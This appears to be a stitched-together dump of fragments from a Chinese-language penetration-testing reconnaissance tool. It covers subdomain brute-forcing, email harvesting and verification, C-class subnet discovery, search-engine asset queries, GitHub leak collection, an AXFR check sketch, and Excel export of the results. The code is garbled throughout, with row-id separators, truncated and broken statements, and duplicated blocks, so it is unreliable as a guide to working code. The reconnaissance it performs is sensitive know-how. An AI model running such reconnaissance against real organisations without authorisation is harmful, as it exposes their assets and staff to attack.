cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
ranetWeb():
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
File = o
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
def run_subdomains(domain):
args = {'cname': 'y', 'default_dns': 'n', 'domain': domain, 'file': None, 'level': 3,
'next_sub_file': './iniFile/subdomain3/next_sub_full.txt', 'other_file': None, 'speed': 'fast', 'sub_file': './iniFile/subdomain3/sub_full.txt'}
Subdomains_ips = {}
brute = Brutedomain(args, Subdomains_ips)
try:
brute.run()
# if ('y' in brute.cname_flag or 'Y' in brute.cname_flag):
# brute.collect_cname()
except KeyboardInterrupt:
print('user stop')
return Subdomains_ips
def subdomains3():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
Subdomains_ips = run_subdomains(domain)
return Subdomains_ips | null |
189,263 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
from Plugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
from Plugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
from Plugins.infoGather.subdomain.CDN import checkCDN
from Plugins.infoGather.subdomain.queryA import queryA
from Plugins.infoGather.subdomain.hostCollide import hostCollide
from Plugins.infoGather.ParamSpider.paramSpider import getParamLinks
import configparser
from Plugins.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
from Plugins.infoGather.subdomain.ip2domain import getIp2Domain
from Plugins.infoGather.subdomain.ipAddress import getIpAddress
from Plugins.infoGather.Intranet import getMoreIp
from Plugins.infoGather.webInfo import getWebTitle
def dnsZoneTransfer():
pass | null |
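dnsZoneTransfer is left as an empty stub above. Below is a minimal sketch of what an AXFR (zone transfer) check usually looks like with dnspython; the function body and its name are assumptions, not the original implementation:
import dns.query
import dns.resolver
import dns.zone
def dnsZoneTransfer_sketch(domain):
    vulnerable_ns = []
    try:
        ns_records = dns.resolver.resolve(domain, 'NS')
    except Exception:
        return vulnerable_ns
    for ns in ns_records:
        ns_name = str(ns.target).rstrip('.')
        try:
            ns_ip = str(dns.resolver.resolve(ns_name, 'A')[0])
            # a successful AXFR means the whole zone is exposed to anyone
            zone = dns.zone.from_xfr(dns.query.xfr(ns_ip, domain, timeout=5))
            if zone is not None:
                vulnerable_ns.append(ns_name)
        except Exception:
            continue
    return vulnerable_ns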
189,264 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
list(set(new_subdomains + old_subdomains)():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
():
cprint('-' * 50 + 'Load getSocksProxy ...' + '-' * 50, 'green')
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
cprint('-' * 50 + 'Load beian2NewDomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
cprint('-' * 50 + 'Load Aiqicha ...' + '-' * 50, 'green')
cprint("查询【{}】公司架构".format(companyName), 'red')
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
():
cprint('-' * 50 + 'check Pan-Analysis ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load ksubdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
theHarvesterIp, emails, hosts = run_theHarvester(domain)
print(hosts)
theHarvesterSubdomains = []
subdomain = None
for host in list(set(hosts)):
if '/' not in host and ' ' not in host:
domain_ip = host.strip().split(':')
if len(domain_ip) == 2:
subdomain, ip = [domain_ip[0]], domain_ip[1]
elif len(domain_ip) == 1:
subdomain, ip = domain_ip, None
if subdomain:
theHarvesterSubdomains.extend(subdomain)
    cprint('-' * 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
aliveEmails = run_verifyEmails(emails)
    theHarvesterIpSheet = saveToExcel(excelSavePath, excel, 'theHarvester—IP')
theHarvesterIpSheet.saveTheHarvesterIp(theHarvesterIp)
emailsSheet = saveToExcel(excelSavePath, excel, '邮箱')
emailsSheet.saveEmails(emails, aliveEmails)
return list(set(theHarvesterSubdomains))
cprint('-' * 50 + 'Load VirusTotal threatcrowd url.fht.im ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
():
cprint('-' * 50 + 'Load Github Api Subdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
cprint('-' * 50 + 'Load Spider ...' + '-' * 50, 'green')
    cprint('-' * 50 + 'Load crawlCerts ...' + '-' * 50, 'green')
    from Plugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
    from Plugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
cprint('-' * 50 + 'check subdomains CDN and query ip ...' + '-' * 50, 'green')
for subdomain in subdomains:
if '.{}'.format(domain) in subdomain:
tmp_subdomains.append(subdomain)
print('Check CDN [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.CDN import checkCDN
print('Query the A record of [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.queryA import queryA
    from Plugins.infoGather.subdomain.hostCollide import hostCollide
    from Plugins.infoGather.ParamSpider.paramSpider import getParamLinks
> 1000:
paramLinks = []
cprint('-' * 50 + 'get_CIP ...' + '-' * 50, 'green')
for subdomain in Subdomains_ips:
        if CDNSubdomainsDict[subdomain] == 'NOT':  # if this subdomain is not behind a CDN, start counting its resolved IPs
ip_List = Subdomains_ips[subdomain]
for ip in ip_List:
if not is_internal_ip(ip):
ips.append(ip)
for ip in list(set(ips)):
c_subnet = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
CIP_List_all.append(c_subnet)
cprint(ip_count, 'red')
import configparser
for ip in ip_count:
if ip_count[ip] > int(c_nums):
CIP_List.append(ip)
    cprint('-' * 50 + 'run_webSpace ...' + '-' * 50, 'green')
    from Plugins.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
for ip in list(set(ips)):
ip_C = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
fofaTitle_IPs.append(ip_C)
    from Plugins.infoGather.subdomain.ip2domain import getIp2Domain
    from Plugins.infoGather.subdomain.ipAddress import getIpAddress
    cprint('-' * 50 + 'collation_web_host ...' + '-' * 50, 'green')
for subdomain in list(set(list(Subdomains_ips.keys()) + ip2domainSubdomains)):
    if ':' in subdomain:  # some ip2domain results look like 221.192.236.146:999, so do not append port 80
web_host_port_temp.append(subdomain)
else:
web_host_port_temp.append('{}:80'.format(subdomain))
from Plugins.infoGather.Intranet import getMoreIp
    from Plugins.infoGather.webInfo import getWebTitle
    cprint('-' * 50 + 'detect Windows vul' + '-' * 50, 'green')
print('[total: {}] ksubdomain: {}'.format(len(ksubdomains), ksubdomains))
print('len [{}]'.format(len(subdomains)))
theHarvesterSubdomains = []
print('[total: {}] theHarvester: {}'.format(len(theHarvesterSubdomains), theHarvesterSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] webAPI: {}'.format(len(othersApiTotalSubdomains), othersApiTotalSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] Github: {}'.format(len(githubApiSubdomains), githubApiSubdomains))
print('[total: {}] Spider: {}'.format(len(spiderSubdomains), spiderSubdomains))
print('[total: {}] Certs: {}'.format(len(certsSubdomains), certsSubdomains))
print('[total: {}] Friends: {}'.format(len(fcSubdomains), fcSubdomains))
print('C段的IP:{}'.format(CIP_List))
print(CIP_List)
print(Subdomains_ips)
print(notCDNSubdomains)
for subdomain in notCDNSubdomains:
for ip in Subdomains_ips[subdomain]:
SubdomainAndNotCDNIPs.append(ip)
IPs) > 10:
SubdomainAndNotCDNIPs = []
    webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
for subdomain in Subdomains_ips.keys():
for ip in Subdomains_ips[subdomain]:
allTargets_Queue.put(ip)
allTargets_List.append(ip)
print('[total: {}] ip2domainSubdomains: {}'.format(len(ip2domainSubdomains), ip2domainSubdomains))
print('[ip2domain get new subdomains] [{}]'.format(len(list(set(ip2domainSubdomains)-set(list(Subdomains_ips.keys()))))))
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
if domain:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
ranetWeb():
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
File = o
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
class saveToExcel:
def __init__(self, excelSavePath, excel, title):
        self.excelSavePath = excelSavePath  # path where the excel file is saved
        self.excel = excel  # an openpyxl.Workbook() instance
        self.sheet = self.excel.create_sheet(title=title)  # create the worksheet
        self.Sheet_line = 1  # current row of the sheet
    # Save the SOCKS proxy list
def saveSocksProxys(self, socksProxysDict):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '谷歌代理'
self.sheet.cell(self.Sheet_line, 2).value = '百度代理'
self.Sheet_line += 1
googleProxys = socksProxysDict["google"]
baiduProxys = socksProxysDict["baidu"]
if googleProxys != []:
for proxy in googleProxys:
self.sheet.cell(self.Sheet_line, 1).value = proxy
self.Sheet_line += 1
self.Sheet_line = 2
if baiduProxys != []:
for proxy in baiduProxys:
self.sheet.cell(self.Sheet_line, 2).value = proxy
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save new top-level domains found by ICP-record reverse lookup
def saveBeianNewDomains(self, beianNewDomains):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '备案号'
self.sheet.cell(self.Sheet_line, 2).value = '网站名'
self.sheet.cell(self.Sheet_line, 3).value = '域名'
self.sheet.cell(self.Sheet_line, 4).value = '备案时间'
self.Sheet_line += 1
for _ in beianNewDomains:
beianId, siteName, newDomain, time = _
self.sheet.cell(self.Sheet_line, 1).value = beianId
self.sheet.cell(self.Sheet_line, 2).value = siteName
self.sheet.cell(self.Sheet_line, 3).value = newDomain
self.sheet.cell(self.Sheet_line, 4).value = time
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save Aiqicha (company information) results
def saveAiqicha(self, selfIcpinfo_infos, invest_infos, holds_infos, branch_infos):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '备案信息'
self.sheet.cell(self.Sheet_line, 2).value = '网站名称'
self.sheet.cell(self.Sheet_line, 3).value = '域名'
self.sheet.cell(self.Sheet_line, 4).value = '备案号'
self.Sheet_line += 1
for _ in selfIcpinfo_infos:
siteName, domain, icpNo = _["siteName"], _["domain"], _["icpNo"]
self.sheet.cell(self.Sheet_line, 1).value = '备案信息'
self.sheet.cell(self.Sheet_line, 2).value = siteName
self.sheet.cell(self.Sheet_line, 3).value = str(domain)
self.sheet.cell(self.Sheet_line, 4).value = icpNo
self.Sheet_line += 1
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '对外投资'
self.sheet.cell(self.Sheet_line, 2).value = '公司名'
self.sheet.cell(self.Sheet_line, 3).value = '投资占比'
self.sheet.cell(self.Sheet_line, 4).value = 'pid'
self.sheet.cell(self.Sheet_line, 5).value = '网站名称'
self.sheet.cell(self.Sheet_line, 6).value = '域名'
self.sheet.cell(self.Sheet_line, 7).value = '备案号'
self.sheet.cell(self.Sheet_line, 8).value = '邮箱地址'
self.sheet.cell(self.Sheet_line, 9).value = '联系方式'
self.Sheet_line += 1
for _ in invest_infos:
pid, invest_info, icp_info, companyDetail_infos = _["pid"], _["invest_info"], _["icp_info"], _["companyDetail_infos"]
entName, regRate = invest_info["entName"], invest_info["regRate"]
emails, telephone = companyDetail_infos["emails"], companyDetail_infos["telephone"]
if icp_info:
for each_icp in icp_info:
# print(each_icp)
siteName, domain, icpNo = each_icp["siteName"], each_icp["domain"], each_icp["icpNo"]
self.sheet.cell(self.Sheet_line, 1).value = '对外投资'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = regRate
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = siteName
self.sheet.cell(self.Sheet_line, 6).value = str(domain)
self.sheet.cell(self.Sheet_line, 7).value = icpNo
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
else:
self.sheet.cell(self.Sheet_line, 1).value = '对外投资'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = regRate
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = ""
self.sheet.cell(self.Sheet_line, 6).value = ""
self.sheet.cell(self.Sheet_line, 7).value = ""
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = '公司名'
self.sheet.cell(self.Sheet_line, 3).value = '投资占比'
self.sheet.cell(self.Sheet_line, 4).value = 'pid'
self.sheet.cell(self.Sheet_line, 5).value = '网站名称'
self.sheet.cell(self.Sheet_line, 6).value = '域名'
self.sheet.cell(self.Sheet_line, 7).value = '备案号'
self.sheet.cell(self.Sheet_line, 8).value = '邮箱地址'
self.sheet.cell(self.Sheet_line, 9).value = '联系方式'
self.Sheet_line += 1
for _ in holds_infos:
pid, holds_info, icp_info, companyDetail_infos = _["pid"], _["holds_info"], _["icp_info"], _["companyDetail_infos"]
entName, proportion = holds_info["entName"], holds_info["proportion"]
emails, telephone = companyDetail_infos["emails"], companyDetail_infos["telephone"]
if icp_info:
for each_icp in icp_info:
siteName, domain, icpNo = each_icp["siteName"], each_icp["domain"], each_icp["icpNo"]
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = proportion
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = siteName
self.sheet.cell(self.Sheet_line, 6).value = str(domain)
self.sheet.cell(self.Sheet_line, 7).value = icpNo
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
else:
self.sheet.cell(self.Sheet_line, 1).value = '控股企业'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = proportion
self.sheet.cell(self.Sheet_line, 4).value = pid
self.sheet.cell(self.Sheet_line, 5).value = ""
self.sheet.cell(self.Sheet_line, 6).value = ""
self.sheet.cell(self.Sheet_line, 7).value = ""
self.sheet.cell(self.Sheet_line, 8).value = str(emails)
self.sheet.cell(self.Sheet_line, 9).value = str(telephone)
self.Sheet_line += 1
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '分支机构'
self.sheet.cell(self.Sheet_line, 2).value = '公司名'
self.sheet.cell(self.Sheet_line, 3).value = 'pid'
self.sheet.cell(self.Sheet_line, 4).value = '网站名称'
self.sheet.cell(self.Sheet_line, 5).value = '域名'
self.sheet.cell(self.Sheet_line, 6).value = '备案号'
self.sheet.cell(self.Sheet_line, 7).value = '邮箱地址'
self.sheet.cell(self.Sheet_line, 8).value = '联系方式'
self.Sheet_line += 1
for _ in branch_infos:
pid, branch_info, icp_info, companyDetail_infos = _["pid"], _["branch_info"], _["icp_info"], _["companyDetail_infos"]
entName = branch_info["entName"]
emails, telephone = companyDetail_infos["emails"], companyDetail_infos["telephone"]
if icp_info:
for each_icp in icp_info:
siteName, domain, icpNo = each_icp["siteName"], each_icp["domain"], each_icp["icpNo"]
                    self.sheet.cell(self.Sheet_line, 1).value = '分支机构'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = pid
self.sheet.cell(self.Sheet_line, 4).value = siteName
self.sheet.cell(self.Sheet_line, 5).value = str(domain)
self.sheet.cell(self.Sheet_line, 6).value = icpNo
self.sheet.cell(self.Sheet_line, 7).value = str(emails)
self.sheet.cell(self.Sheet_line, 8).value = str(telephone)
self.Sheet_line += 1
else:
                self.sheet.cell(self.Sheet_line, 1).value = '分支机构'
self.sheet.cell(self.Sheet_line, 2).value = entName
self.sheet.cell(self.Sheet_line, 3).value = pid
self.sheet.cell(self.Sheet_line, 4).value = ""
self.sheet.cell(self.Sheet_line, 5).value = ""
self.sheet.cell(self.Sheet_line, 6).value = ""
self.sheet.cell(self.Sheet_line, 7).value = str(emails)
self.sheet.cell(self.Sheet_line, 8).value = str(telephone)
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save the IPs collected by theHarvester
def saveTheHarvesterIp(self, theHarvesterIp):
self.sheet.cell(self.Sheet_line, 1).value = 'IP'
self.Sheet_line += 1
for ip in theHarvesterIp:
self.sheet.cell(self.Sheet_line, 1).value = ip
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save email addresses
def saveEmails(self, emails, aliveEmails):
self.sheet.cell(self.Sheet_line, 1).value = '收集的邮箱'
self.sheet.cell(self.Sheet_line, 2).value = '真实的邮箱'
self.Sheet_line += 1
for email in emails:
self.sheet.cell(self.Sheet_line, 1).value = email
self.Sheet_line += 1
self.Sheet_line = 2
for email in aliveEmails:
self.sheet.cell(self.Sheet_line, 2).value = email
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save crawler results
    def saveSpider(self, spiderName, links):  # spiderName is the search engine name, e.g. Baidu or Bing
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '爬虫'
self.sheet.cell(self.Sheet_line, 2).value = '关键字'
self.sheet.cell(self.Sheet_line, 3).value = '链接'
self.sheet.cell(self.Sheet_line, 4).value = '标题'
self.Sheet_line += 1
for _ in links:
each_wd, link, title = _
self.sheet.cell(self.Sheet_line, 1).value = spiderName
self.sheet.cell(self.Sheet_line, 2).value = each_wd
self.sheet.cell(self.Sheet_line, 3).value = link
try:
self.sheet.cell(self.Sheet_line, 4).value = title
except Exception as e:
self.sheet.cell(self.Sheet_line, 4).value = ''
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save certificate results
def saveCert(self, trustedDomainDict):
self.sheet.cell(self.Sheet_line, 1).value = '子域名'
self.sheet.cell(self.Sheet_line, 2).value = '证书信任域名'
self.Sheet_line += 1
for subdomain in trustedDomainDict:
certs = trustedDomainDict[subdomain]
for cert in certs:
self.sheet.cell(self.Sheet_line, 1).value = subdomain
self.sheet.cell(self.Sheet_line, 2).value = cert
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save sensitive information found on GitHub
def saveGithub(self, gitSensitiveInfo):
self.sheet.cell(self.Sheet_line, 1).value = '关键字'
self.sheet.cell(self.Sheet_line, 2).value = '行数'
self.sheet.cell(self.Sheet_line, 3).value = '内容'
self.sheet.cell(self.Sheet_line, 4).value = '作者邮箱'
self.Sheet_line += 1
for info in gitSensitiveInfo:
keyword, line, content, email = info
self.sheet.cell(self.Sheet_line, 1).value = keyword
self.sheet.cell(self.Sheet_line, 2).value = line
try:
self.sheet.cell(self.Sheet_line, 3).value = content
except Exception as e:
self.sheet.cell(self.Sheet_line, 3).value = None # 可能会报错
self.sheet.cell(self.Sheet_line, 4).value = email
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save dynamic links and admin/backend URLs
def saveparamHtLinks(self, paramLinks, htLinks):
self.sheet.cell(self.Sheet_line, 1).value = '链接'
self.sheet.cell(self.Sheet_line, 2).value = '标题'
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '动态链接'
self.sheet.cell(self.Sheet_line, 2).value = len(paramLinks)
self.Sheet_line += 1
for paramLink in paramLinks:
self.sheet.cell(self.Sheet_line, 1).value = paramLink
self.Sheet_line += 1
self.sheet.cell(self.Sheet_line, 1).value = '后台地址'
self.sheet.cell(self.Sheet_line, 2).value = len(htLinks)
self.Sheet_line += 1
for _ in htLinks:
link, title = _
self.sheet.cell(self.Sheet_line, 1).value = link
self.sheet.cell(self.Sheet_line, 2).value = title
try:
self.sheet.cell(self.Sheet_line, 2).value = title
except Exception as e:
self.sheet.cell(self.Sheet_line, 2).value = ''
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save A-record results
def saveQueryA(self, Subdomains_ips, CDNSubdomainsDict):
self.sheet.cell(self.Sheet_line, 1).value = '子域名'
self.sheet.cell(self.Sheet_line, 2).value = 'A记录IP'
self.sheet.cell(self.Sheet_line, 3).value = 'CDN'
self.Sheet_line += 1
for subdomain in Subdomains_ips:
ips = str(Subdomains_ips[subdomain])
self.sheet.cell(self.Sheet_line, 1).value = subdomain
self.sheet.cell(self.Sheet_line, 2).value = ips
self.sheet.cell(self.Sheet_line, 3).value = str(CDNSubdomainsDict[subdomain])
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save host-collision results
def saveHostCollide(self, hostCollideResult):
self.sheet.cell(self.Sheet_line, 1).value = 'Host'
self.sheet.cell(self.Sheet_line, 2).value = 'URL'
self.sheet.cell(self.Sheet_line, 3).value = '状态码'
self.sheet.cell(self.Sheet_line, 4).value = '带Host的标题'
self.sheet.cell(self.Sheet_line, 5).value = '不带Host的标题'
self.Sheet_line += 1
for _ in hostCollideResult:
host, ip, code, title, title2 = _
self.sheet.cell(self.Sheet_line, 1).value = host
self.sheet.cell(self.Sheet_line, 2).value = ip
self.sheet.cell(self.Sheet_line, 3).value = code
self.sheet.cell(self.Sheet_line, 4).value = str(title)
self.sheet.cell(self.Sheet_line, 5).value = str(title2)
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save fofa and shodan results
def saveWebSpace(self, webSpaceName, webSpaceResult, query_str):
if self.Sheet_line == 1:
self.sheet.cell(self.Sheet_line, 1).value = '空间引擎名'
self.sheet.cell(self.Sheet_line, 2).value = 'host'
self.sheet.cell(self.Sheet_line, 3).value = '标题'
self.sheet.cell(self.Sheet_line, 4).value = 'ip'
self.sheet.cell(self.Sheet_line, 5).value = '子域名'
self.sheet.cell(self.Sheet_line, 6).value = '端口'
self.sheet.cell(self.Sheet_line, 7).value = '服务'
self.sheet.cell(self.Sheet_line, 8).value = '协议'
self.sheet.cell(self.Sheet_line, 9).value = '地址'
self.sheet.cell(self.Sheet_line, 10).value = '查询语句'
self.sheet.cell(self.Sheet_line, 11).value = 'robots'
self.sheet.cell(self.Sheet_line, 12).value = '证书'
self.sheet.cell(self.Sheet_line, 13).value = '公司名'
self.sheet.cell(self.Sheet_line, 14).value = 'isp'
self.sheet.cell(self.Sheet_line, 15).value = '收录时间'
self.Sheet_line += 1
for result in webSpaceResult:
if webSpaceName == 'fofa':
host, title, ip, subdomain, port, server, protocol, address = result
elif webSpaceName == 'shodan':
host, title, ip, subdomain, port, server, protocol, address, robots = result
self.sheet.cell(self.Sheet_line, 11, robots)
elif webSpaceName == 'quake':
host, title, ip, subdomain, port, server, protocol, address, cert = result
self.sheet.cell(self.Sheet_line, 12, str(cert))
else:
host, title, ip, subdomain, port, server, protocol, address, company, isp, updated_at = result
self.sheet.cell(self.Sheet_line, 13, company)
self.sheet.cell(self.Sheet_line, 14, isp)
self.sheet.cell(self.Sheet_line, 15, updated_at)
try:
title = ILLEGAL_CHARACTERS_RE.sub(r'', title)
except Exception as e:
title = ''
self.sheet.cell(self.Sheet_line, 1).value = webSpaceName
self.sheet.cell(self.Sheet_line, 2).value = host
self.sheet.cell(self.Sheet_line, 3).value = title
self.sheet.cell(self.Sheet_line, 4).value = ip
self.sheet.cell(self.Sheet_line, 5).value = subdomain
self.sheet.cell(self.Sheet_line, 6).value = port
self.sheet.cell(self.Sheet_line, 7).value = server
self.sheet.cell(self.Sheet_line, 8).value = protocol
self.sheet.cell(self.Sheet_line, 9).value = address
self.sheet.cell(self.Sheet_line, 10).value = query_str
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save non-web services found by the cyberspace search engines
def saveService(self, serviceResult):
self.sheet.cell(self.Sheet_line, 1).value = '协议'
self.sheet.cell(self.Sheet_line, 2).value = 'ip'
self.sheet.cell(self.Sheet_line, 3).value = 'port'
self.Sheet_line += 1
for result in serviceResult:
protocol, ip, port = result
self.sheet.cell(self.Sheet_line, 1).value = protocol
self.sheet.cell(self.Sheet_line, 2).value = ip
self.sheet.cell(self.Sheet_line, 3).value = port
self.Sheet_line += 1
self.excel.save(self.excelSavePath)
    # Save hostnames and all IPs of alive intranet hosts
def saveHostNameAndIps(self, alive_hostname_ips):
self.sheet.cell(self.Sheet_line, 1).value = 'ip'
self.sheet.cell(self.Sheet_line, 2).value = '主机名'
self.sheet.cell(self.Sheet_line, 3).value = '其他IP'
self.Sheet_line += 1
for each in alive_hostname_ips:
try:
if len(each) == 1:
self.sheet.cell(self.Sheet_line, 1).value = each[0]
if len(each) == 2:
self.sheet.cell(self.Sheet_line, 1).value = each[0]
self.sheet.cell(self.Sheet_line, 2).value = each[1]
if len(each) > 2:
self.sheet.cell(self.Sheet_line, 1).value = each[0]
self.sheet.cell(self.Sheet_line, 2).value = each[1]
self.sheet.cell(self.Sheet_line, 3).value = each[2]
self.Sheet_line += 1
for moreIp in each[3:]:
self.sheet.cell(self.Sheet_line, 3).value = moreIp
self.Sheet_line += 1
except Exception as e:
pass
self.excel.save(self.excelSavePath)
    # Save IP-to-domain reverse lookup results
def saveIp2Domain(self, ip2domain_dict):
self.sheet.cell(self.Sheet_line, 1).value = 'ip'
self.sheet.cell(self.Sheet_line, 2).value = '域名'
self.Sheet_line += 1
for ip in ip2domain_dict.keys():
ip, subdomains = ip, ip2domain_dict[ip]
self.sheet.cell(self.Sheet_line, 1).value = ip # c段的ip
self.sheet.cell(self.Sheet_line, 2).value = str(subdomains) # ip反查出来的子域名
self.Sheet_line += 1
